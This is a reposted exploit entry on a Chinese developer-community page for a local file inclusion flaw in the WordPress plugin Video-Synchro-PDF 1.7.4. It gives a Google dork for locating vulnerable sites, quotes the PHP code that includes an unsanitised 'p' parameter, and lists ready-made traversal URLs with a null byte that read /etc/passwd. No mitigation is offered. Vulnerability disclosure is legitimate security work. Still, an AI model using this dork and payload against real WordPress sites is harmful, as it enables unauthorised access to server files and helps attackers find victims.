前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress Video-Synchro-PDF 1.7.4 本地文件包含

WordPress Video-Synchro-PDF 1.7.4 本地文件包含

作者头像
Khan安全团队
发布2022-04-21 11:40:39
4580
发布2022-04-21 11:40:39
举报
文章被收录于专栏:Khan安全团队

# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/

# 日期:29-03-2022

# 漏洞利用作者:Hassan Khan Yusufzai - Splint3r7

# 供应​​商主页:https://wordpress.org/plugins/video-synchro-pdf/

# 版本:1.7.4

# 漏洞文件:video-synchro-pdf/reglages/Menu_Plugins/tout.php

# 漏洞代码:

代码语言:javascript
复制
<?php
if ($_GET['p']<=NULL) {
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}

代码语言:javascript
复制
http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]
http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>../../../../../../../../../etc/passwd%00

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档